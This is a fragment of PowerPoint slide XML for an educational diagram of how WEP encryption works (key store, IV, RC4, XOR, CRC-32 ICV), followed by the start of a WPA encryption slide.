                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA716738-79AB-455C-ABB3-DF78229A0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7552" y="3271616"/>
              <a:ext cx="1933468" cy="404125"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 25981"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:sysClr val="window" lastClr="FFFFFF">
                    <a:alpha val="75000"/>
                  </a:sysClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:sysClr val="window" lastClr="FFFFFF">
                    <a:gamma/>
                    <a:tint val="0"/>
                    <a:invGamma/>
                    <a:alpha val="0"/>
                  </a:sys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09163D35-0181-489F-833E-F2BC5B983F1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2874518" y="3403720"/>
              <a:ext cx="1815545" cy="58477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WEP Key Store </a:t>
              </a:r>
              <a:b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(K1, K2, K3, K4)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="150" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C667C0-0490-4C0E-87F7-1DFF56CEB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0764" y="5261329"/>
              <a:ext cx="1355700" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF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BF5B467D-1ED5-4468-96D2-0958518CDFFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3623759" y="4496335"/>
              <a:ext cx="1316656" cy="30777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WEP Seed</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="152" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7EDBDEA-D538-409F-BB99-8B7142AF8F9A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3802206" y="4364549"/>
              <a:ext cx="921567" cy="540449"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 2655"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="153" name="Picture 152" descr="one2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD813BA0-8993-417D-8BC5-2C244E4A23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duotone>
                <a:srgbClr val="F79646">
                  <a:shade val="45000"/>
                  <a:satMod val="135000"/>
                </a:srgb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55780" y="3450810"/>
              <a:ext cx="902315" cy="89138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4" name="Picture 153" descr="one1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E369E751-BF8B-4CCF-8CAA-0E0B81EDCE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duotone>
                <a:srgbClr val="4BACC6">
                  <a:shade val="45000"/>
                  <a:satMod val="135000"/>
                </a:srgb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4733793" y="3963223"/>
              <a:ext cx="902085" cy="89273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155" name="Elbow Connector 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{382BDB62-BD47-4827-9F83-9F1A756161F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="154" idx="2"/>
              <a:endCxn id="157" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="5249675" y="4791112"/>
              <a:ext cx="655862" cy="785543"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxn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BCB3322E-4E31-4953-81FF-3637D2E1F75A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8716274" y="5856943"/>
              <a:ext cx="3111760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WEP-encrypted Packet (Frame body of MAC Frame)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="157" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5220DEFE-7D35-47FD-B3F4-786677416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378" y="5264486"/>
              <a:ext cx="1804112" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="25400">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="65000"/>
                </a:sysClr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EE8F845E-0687-4D32-9414-07A857F7F1A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9490394" y="3657884"/>
              <a:ext cx="1053150" cy="492443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CRC-32 </a:t>
              </a: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Checksum</a:t>
              </a:r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98751118-61F7-4D3F-A905-04D533D57F40}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6346984" y="5357927"/>
              <a:ext cx="1050905" cy="30777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Keystream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D748FE33-225C-4E55-9CBB-57F9E9334449}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4765585" y="4145631"/>
              <a:ext cx="846645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RC4 Cipher</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="161" name="Picture 160" descr="one">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED0F9475-9C2A-49E3-9455-983ACDEC5F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06925" y="4606489"/>
              <a:ext cx="263625" cy="26091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162" name="Elbow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C6E076-D6F6-4854-B95D-0F0D2F68583E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7470547" y="4736810"/>
              <a:ext cx="3537099" cy="485484"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxn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379D52BA-C694-4543-ABE5-DDEFD270E804}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5536809" y="4589011"/>
              <a:ext cx="1707721" cy="30777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XOR Algorithm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="164" name="Rectangle 163">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACD9191B-757B-4CD2-8AA1-0B06302A4005}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7199857" y="4581334"/>
              <a:ext cx="284051" cy="30777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</a:rPr>
                <a:t>X</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="165" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B4B306-F38F-4AF9-9C35-61EA84517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9138" y="5261329"/>
              <a:ext cx="825747" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF0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66" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5977CF1-2C7F-432B-97A1-328648E93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0146" y="3689667"/>
              <a:ext cx="1355700" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF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67" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E21A86-AD06-46AC-884D-A5E898F4F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27244" y="3689667"/>
              <a:ext cx="825747" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF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68" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D5DDAB-16F7-421A-B7DF-D59454AE3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0244" y="5233187"/>
              <a:ext cx="832259" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF0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69" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D357D71-249E-4F00-AAAE-35FCBA610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47148" y="5229337"/>
              <a:ext cx="566605" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF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70" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6AF3AC5-F590-4C0D-9B0F-556BC29A6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25654" y="5229337"/>
              <a:ext cx="566605" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF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71" name="AutoShape 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B63306FC-40F6-43EB-AAF6-65C6211162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08288" y="5229337"/>
              <a:ext cx="1514458" cy="494658"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF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8E518DA9-440E-4756-A58C-CE3D0973F5E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2755771" y="5385493"/>
              <a:ext cx="1159477" cy="30777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WEP Key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185932AE-8E77-4780-9638-06EC1953395B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4229751" y="5378562"/>
              <a:ext cx="500576" cy="30777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IV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F7522A54-E7E0-417A-9AFE-AB2B31AD96AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6726743" y="3814025"/>
              <a:ext cx="782507" cy="30777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Data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149F1EF2-3EAC-4386-A25E-12FC1F9532D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7922307" y="3814025"/>
              <a:ext cx="633107" cy="30777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ICV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66842EC4-AE83-43A6-93BF-2FB10C6D8FE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8436365" y="5345811"/>
              <a:ext cx="500576" cy="30777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IV</a:t>
              </a:r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449596F9-9502-4C76-A56D-4F8AB343276A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8975101" y="5345811"/>
              <a:ext cx="734960" cy="30777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PAD</a:t>
              </a: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3B992EAE-76C0-4876-8484-8DF1EC311ED9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9626549" y="5345811"/>
              <a:ext cx="556735" cy="30777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KID</a:t>
              </a:r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99A9326E-9737-43C0-A023-11DF49B434CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10327488" y="5345811"/>
              <a:ext cx="1276905" cy="30777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Ciphertext</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="180" name="Elbow Connector 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E3C5AA-4A99-440A-A24B-F1A2007ACF7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="166" idx="0"/>
              <a:endCxn id="153" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="8443039" y="2125768"/>
              <a:ext cx="238857" cy="2888942"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 195706"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="181" name="Elbow Connector 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB108A62-7D1F-4DC2-BBCD-F497CD43E541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="153" idx="2"/>
              <a:endCxn id="167" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1">
              <a:off x="9044596" y="3379847"/>
              <a:ext cx="157865" cy="1766822"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -66565"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="182" name="Straight Arrow Connector 181">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{546E4D2F-54C9-4F98-8EEA-97958F99C1BC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3348614" y="4093614"/>
              <a:ext cx="0" cy="1162920"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr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C18563E9-AB3F-4FD6-95E3-BDD07D633356}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2793577" y="4904998"/>
              <a:ext cx="0" cy="359488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/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="me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4042E3BB-CB0F-4E57-B883-E7DABE2B26AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2817552" y="4904998"/>
              <a:ext cx="1872510" cy="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/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="me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77F133F6-5D63-4C04-9C68-DBED7A134D02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4714037" y="4904998"/>
              <a:ext cx="0" cy="350736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/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Rectangle 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5088B86-A48D-4331-A966-6E9CE333484A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469123" y="4629886"/>
            <a:ext cx="1402518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itchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How WEP Works</a:t>
            </a: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5DBBB2BA-861C-4F34-991A-AEF6A70D8368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5784007" y="1169707"/>
            <a:ext cx="410654" cy="584757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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRP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C6FF63ED-769B-4B56-9ACC-D94EEB8A6E5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9719917" y="1169707"/>
            <a:ext cx="410654" cy="584757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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRP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999477F5-02D8-4DFD-BF3E-F2D38C6DF024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836279" y="1169707"/>
            <a:ext cx="410654" cy="584757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algn="ctr" defTabSz="914217">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403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869976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Полилиния 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFFA8B45-7915-45C5-BE58-70342A58E397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4310377" y="-1328428"/>
            <a:ext cx="3571250" cy="1219200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09539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200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204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7595D9A-2476-4EEB-B2FC-98C2F244EAC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="185704"/>
            <a:ext cx="9906000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Wi-Fi Protected Access (WPA) Encryption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E9D5AF5-DF9F-4833-A1D0-A1CBBFB1E2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="685800" y="1216535"/>
            <a:ext cx="666206" cy="666206"/>
            <a:chOff x="685800" y="1111760"/>
            <a:chExt cx="666206" cy="666206"/>
          </a:xfrm>
        </p:grpSpPr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61FEA72F-EB5F-4952-BF63-0DBD327F0AF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="685800" y="1111760"/>
              <a:ext cx="666206" cy="666206"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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9" name="Freeform 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{517158F5-A31F-4222-8949-BEBDE0B6C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703" y="1280668"/>
              <a:ext cx="328388" cy="328389"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 74787349 w 602"/>
                <a:gd name="T1" fmla="*/ 78442719 h 602"/>
                <a:gd name="T2" fmla="*/ 74787349 w 602"/>
                <a:gd name="T3" fmla="*/ 78442719 h 602"/>
                <a:gd name="T4" fmla="*/ 3654649 w 602"/>
                <a:gd name="T5" fmla="*/ 78442719 h 602"/>
                <a:gd name="T6" fmla="*/ 0 w 602"/>
                <a:gd name="T7" fmla="*/ 74657633 h 602"/>
                <a:gd name="T8" fmla="*/ 0 w 602"/>
                <a:gd name="T9" fmla="*/ 3654665 h 602"/>
                <a:gd name="T10" fmla="*/ 3654649 w 602"/>
                <a:gd name="T11" fmla="*/ 0 h 602"/>
                <a:gd name="T12" fmla="*/ 74787349 w 602"/>
                <a:gd name="T13" fmla="*/ 0 h 602"/>
                <a:gd name="T14" fmla="*/ 78441997 w 602"/>
                <a:gd name="T15" fmla="*/ 3654665 h 602"/>
                <a:gd name="T16" fmla="*/ 78441997 w 602"/>
                <a:gd name="T17" fmla="*/ 74657633 h 602"/>
                <a:gd name="T18" fmla="*/ 74787349 w 602"/>
                <a:gd name="T19" fmla="*/ 78442719 h 602"/>
                <a:gd name="T20" fmla="*/ 71002280 w 602"/>
                <a:gd name="T21" fmla="*/ 7308970 h 602"/>
                <a:gd name="T22" fmla="*/ 71002280 w 602"/>
                <a:gd name="T23" fmla="*/ 7308970 h 602"/>
                <a:gd name="T24" fmla="*/ 7439717 w 602"/>
                <a:gd name="T25" fmla="*/ 7308970 h 602"/>
                <a:gd name="T26" fmla="*/ 7439717 w 602"/>
